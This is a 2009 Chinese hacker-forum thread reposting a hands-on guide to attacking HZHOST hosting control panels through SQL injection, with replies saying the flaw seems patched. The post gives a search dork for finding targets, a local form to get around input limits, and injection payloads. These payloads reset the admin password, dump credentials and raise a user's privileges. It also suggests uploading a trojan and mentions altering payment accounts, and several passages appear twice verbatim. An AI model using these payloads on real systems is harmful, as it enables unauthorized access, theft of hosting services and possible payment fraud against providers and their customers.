重发:惊爆HZHOST漏洞,向空间商反击(红盟原发贴者-卓卓)

7945 9
opeat 2009-1-21 10:17:59 | 显示全部楼层 |阅读模式
      现在的空间是越来越贵了,不知道怎么回事,是不是空间商从中牟取暴力呢?想起来就是气啊。
  HZHOST是一种空间商常用的一套在线开通ftp,sql,web的管理系统, 基本上国内50%的空间商都用了这套系统,前几天HZHOST爆出了严重的SQL注入漏洞,可算是我们要报仇了。



  我们在百度搜索:title: (域名主机实时管理系统),可以看到搜索结果有6000多个,如图1 1.jpg 随便找一个,打开后界面如图2,随便找一个,打开后界面如图2 2.jpg ,我们在域名输入框中输入“123\' and user > 0--”,然后再随便输入个密码,点一下登陆,返回了将 nvarchar 值 \'hzhost\' 转换为数据类型为 int 的列时发生语法错误”,如图3 3.jpg ,这说明我们基本成功了,只要我们在域名输入框中输入我们的注入语句,那……(后果很严重)……%20
[size=/]
[size=/][/url]我们输入刚才得到的账号和密码,按“登录”后成功的进入了后台,嘿嘿,现在可以免费用空间,用域名,用数据库了,嘿嘿。

  现在我们再回到登录页面,在我们准备输入我们的注入语句时,发现了一个问题,输入框有输入长度限制,这个好办,我们在本地做个提交页面就可以了。在本地新建一个文本文档,写入如下代码:


<form action=http:// www.xxx.com/domain/login.asp method=post>


<!―www.xxx.com是对方的域名-->


注入语句:<input name=\"domainname\" type=\"text\"  size=\"100\">


<input name=\"domainpass\" type=\"hidden\" value=\"123456\" size=\"50\"></br>


<input type=\"submit\" value=\"提交\">


</form>]


保存后把后缀名改成.htm的网页格式。


  打开我们保存的网页文件,如图4 4.jpg 这说明我们基本成功了,只要我们在域名输入框中输入我们的注入语句,那……(后果很严重)……


  现在我们再回到登录页面,在我们准备输入我们的注入语句时,发现了一个问题,输入框有输入长度限制,这个好办,我们在本地做个提交页面就可以了。在本地新建一个文本文档,写入如下代码:


<form action=http:// www.xxx.com/domain/login.asp method=post>


<!―www.xxx.com是对方的域名-->


注入语句:<input name=\"domainname\" type=\"text\"  size=\"100\">


<input name=\"domainpass\" type=\"hidden\" value=\"123456\" size=\"50\"></br>


<input type=\"submit\" value=\"提交\">


</form>]


保存后把后缀名改成.htm的网页格式。


  打开我们保存的网页文件,如图4 5.jpg
  一般来说,管理员登陆的页面在http://www.xxx.com/master,我们现在上去看看。打开管理员登陆页面如图6所示这说明我们已经成功了。那我们刚才提交的那个注入语句到底是什么意思呢,这一句的意思就是将memlst中u_nme字段所对应的u_pss字段更改为e10adc3949ba59abbe56e057f20f883e,e10adc3949ba59abbe56e057f20f883e是123456经过md5加密后的值,也就是说提交了这一句以后,我们就已经把管理员组中的admin的密码改成了123456。


  一般来说,管理员登陆的页面在http://www.xxx.com/master,我们现在上去看看。打开管理员登陆页面如图6 6.jpg 所示,[img]
[url=http://chinesehongker.com/forum/[/img]%20

  大家在搞的时候可能会遇到点细节问题,比如admin不是超级管理员,或者admin被删除的情况。如果遇到这种情况,我们也不用着急,我们还有三种办法:


1.构造一个语句把管理员账号给暴出来


2.自己先注册个用户,然后提升自己注册用户的控制权限。


第一种方法:提交以下的注入语句:


123\' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and \'1\'=\'1


第二种方法:分别提交以下的注入语句:


123\' UPDATE [memlst] SET u_sys=6 WHERE u_nme=\'你注册的用户名\'--


123\' UPDATE [memlst] SET u_pwr=2 WHERE u_nme=\'你注册的用户名\'--


网上还有第三种方法,暴路径,备份差异,取webshell,这种方法太过烦琐,并且效果不是很好,本人不推荐,如果有朋友想拿webshell的话,直接开通一个空间,FTP个木马上去多方便?如图7 7.jpg



  大家在搞的时候可能会遇到点细节问题,比如admin不是超级管理员,或者admin被删除的情况。如果遇到这种情况,我们也不用着急,我们还有三种办法:


1.构造一个语句把管理员账号给暴出来


2.自己先注册个用户,然后提升自己注册用户的控制权限。


第一种方法:提交以下的注入语句:


123\' and (select top 1 isnull(cast([u_nme] as nvarchar(4000)),char(32))+char(94)+isnull(cast([U_pss] as nvarchar(4000)),char(32)) from (select top 2u_nme,U_pss from [hzhost]..[memlst] where 1=1 order by [u_nme]) t order by [u_nme] desc )>0-- and \'1\'=\'1


第二种方法:分别提交以下的注入语句:


123\' UPDATE [memlst] SET u_sys=6 WHERE u_nme=\'你注册的用户名\'--


123\' UPDATE [memlst] SET u_pwr=2 WHERE u_nme=\'你注册的用户名\'--


网上还有第三种方法,暴路径,备份差异,取webshell,这种方法太过烦琐,并且效果不是很好,本人不推荐,如果有朋友想拿webshell的话,直接开通一个空间,FTP个木马上去多方便?如图8 8.jpg



    最后在这里告诫一下大家,在后台还可以修改在线网银支付的账号,大家可别经不起诱惑啊,等到惹祸了,那就麻烦了。
---  no one knows my mind !         
红盟学者 2009-1-21 10:22:52 | 显示全部楼层
呵呵
这个漏洞挺大的、
opeat你帮着发了,那我就``不管了
用时间 努力去换来技术!
opeat 2009-1-21 10:26:13 | 显示全部楼层
呵呵~  他们权限不够~~~  不能传图片上来! 我就帮着发下了!!
---  no one knows my mind !         
yufeicn 2009-1-21 10:41:30 | 显示全部楼层
刚才试了几个
已经不存在这个漏洞了..
学技术先学做人! 人不行,就别说技术了!道,非常道;名,非常名! 中国红客联盟(HUC)http://www.chinesehongker.com/ [红―客]http://www.hon-ker.cn/ 弘扬红客精神,发扬红客文化
午夜做土匪 2009-1-24 10:58:06 | 显示全部楼层
会修复的嘛...!您们以为人家不想吃饭啊?
实力打造经典.王者绝非偶然,哥的魅力永远流传!不要迷恋哥..哥我只是个传说!
飞龙 2009-1-27 22:32:22 | 显示全部楼层
牛.........
不要轻言放弃.失败乃成功他亲娘.没有永远的菜鸟.
fengshidou 2009-2-8 18:00:16 | 显示全部楼层
高手就是高手啊
李晟艺 2022-3-5 14:40:41 | 显示全部楼层
这个漏洞挺大的
凶秽消散,道炁常存。
时砾逐光 2022-3-20 13:38:54 来自手机 | 显示全部楼层
目前不是很懂
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

opeat

荣誉会员

关注
  • 29
    主题
  • 19
    粉丝
  • 28
    关注
No weapon that is formed against you will prevail.

中国红客联盟公众号

联系站长QQ:5520533

admin@chnhonker.com
Copyright © 2001-2026 Discuz Team. Powered by Discuz! X3.5 ( 粤ICP备13060014号 )|天天打卡 本站已运行